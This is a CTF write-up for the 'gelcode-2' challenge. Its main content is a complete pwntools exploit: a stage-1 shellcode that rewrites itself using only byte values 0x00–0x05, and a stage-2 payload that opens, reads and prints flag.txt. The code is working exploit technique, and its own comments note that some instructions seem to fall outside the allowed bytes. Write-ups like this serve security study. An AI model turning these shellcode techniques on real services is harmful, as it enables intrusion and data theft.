Tags: shellcode 

Rating:

The challenge imposes two main restrictions.
First, the shellcode may only contain byte values in the range 0x00–0x05.
Second, the maximum shellcode length grew the longer the challenge went unsolved; it ended at 362 bytes. I didn't finish this challenge until a couple of hours after the CTF ended, but I was able to get my stage-1 shellcode down to 222 bytes.

```
from pwn import *

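# Final length limit the challenge reached; the binary takes it as argv[1].
STAGE1_LIMIT = 362

p = process(['./gelcode-2', str(STAGE1_LIMIT)])

# Debugging aid only; drop it when running outside an interactive session.
gdb.attach(p)

# Stage 1: the byte-restricted payload. The writeup states only byte values
# 0x00-0x05 are accepted, so the payload is built from `add` encodings
# (00 /r, 01 /r, 04 ib, 05 id) that self-modify the bytes following them
# into the instructions that are actually needed (comments name the target
# of each group).
# NOTE(review): `nop` (0x90) and `mov byte ptr [rip], al` (0x88 ...) assemble
# to bytes outside 0x00-0x05 as the filter is described above - confirm
# against the challenge binary how those positions pass the check.
shellcode = '''
/*mov eax, 0x358d48*/
/*lea rsi, [rip]*/
add [rip+3], al
add eax, 0x5050505
add eax, 0x5050505
add eax, 0x5050505
add eax, 0x5050505
add eax, 0x5050505
add eax, 0x5010505
add eax, 0x4050505

add eax, 0x00502
add [rip+1], al
add al, 0
add eax, 0x00500
add eax, 0x00500
add eax, 0x00300

add dword ptr [rip], eax
nop
nop
nop
nop
nop
add dword ptr [rip], eax
nop
nop
nop
nop
nop
nop
nop

/*mov edx, 0x503*/
add al, 5
add al, 5
add al, 5
add al, 5
mov [rip+1], al
add al, 2

mov byte ptr [rip], al

nop
add al, 5
nop
nop

/*mov edi, 0*/
/*add eax, 0x050505*/
add al, 5

mov byte ptr [rip], al
nop
nop
nop
nop
nop

/*syscall (try to zero out eax)*/

/*xor eax, eax; syscall*/
/*0x358dbf = start*/
/*050fc031 = target*/
mov byte ptr [rip+3], al
add eax, 0x4050505
add eax, 0x0050505
add eax, 0x0050505
add eax, 0x0050505
add eax, 0x0050505
add eax, 0x0020505
add eax, 0x0000505
add eax, 0x0000505
add eax, 0x000505
add eax, 0x000505
add eax, 0x0000105

add al, 5
add al, 5

add al, 5
add al, 5
add al, 5
add al, 5
add al, 4

add [rip+1], al
add al, 1

add [rip], eax
'''

# Stage 2: unrestricted shellcode, read in by the stage-1 `read` syscall.
#   mov rsp, rsi      - rsi is assumed to point at this buffer (set up by
#                       stage 1); it doubles as the stack / read buffer.
#   call next         - pushes the address of the 9 nop bytes, which are
#                       overwritten below with "flag.txt\0"; `pop rdi`
#                       therefore receives the path pointer.
#   open("flag.txt", O_RDONLY) -> read(fd, rsp, 100) -> write(1, rsp, 100)
shell = '''
mov rsp, rsi
call next
nop
nop
nop
nop
nop
nop
nop
nop
nop
next:
pop rdi
push 0
pop rsi
push 2
pop rax
syscall

xchg edi, eax
push 0
pop rax
mov rsi, rsp
mov rdx, 100
syscall

push 1
pop rax
push 1
pop rdi
syscall

'''

shell = asm(shell, arch='amd64')

# Offset of the nop slot: `mov rsp, rsi` (48 89 f4, 3 bytes) + `call rel32`
# (e8 + 4, 5 bytes). Verify the slot before patching so a change to the
# stage-2 prologue fails loudly instead of silently corrupting code.
FLAG_PATH = b"flag.txt\x00"
PATH_OFF = 8
slot = shell[PATH_OFF:PATH_OFF + len(FLAG_PATH)]
if slot != b"\x90" * len(FLAG_PATH):
    raise ValueError("nop slot for the path moved; update PATH_OFF")
# bytes literals keep this working under both Python 2 and Python 3 pwntools.
shell = shell[:PATH_OFF] + FLAG_PATH + shell[PATH_OFF + len(FLAG_PATH):]

shellcode = asm(shellcode, arch='amd64')
print(len(shellcode))

# ljust does not truncate: make sure the payload plus the newline sendline
# appends still fits the limit passed to the binary.
if len(shellcode) > STAGE1_LIMIT - 1:
    raise ValueError("stage-1 shellcode exceeds the %d-byte limit" % STAGE1_LIMIT)
p.sendline(shellcode.ljust(STAGE1_LIMIT - 1, b'\x00'))

# nop sled in front of stage 2; the exact landing point is presumably not
# known precisely, hence the slack.
p.sendline(b'\x90' * 200 + shell)

p.interactive()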

```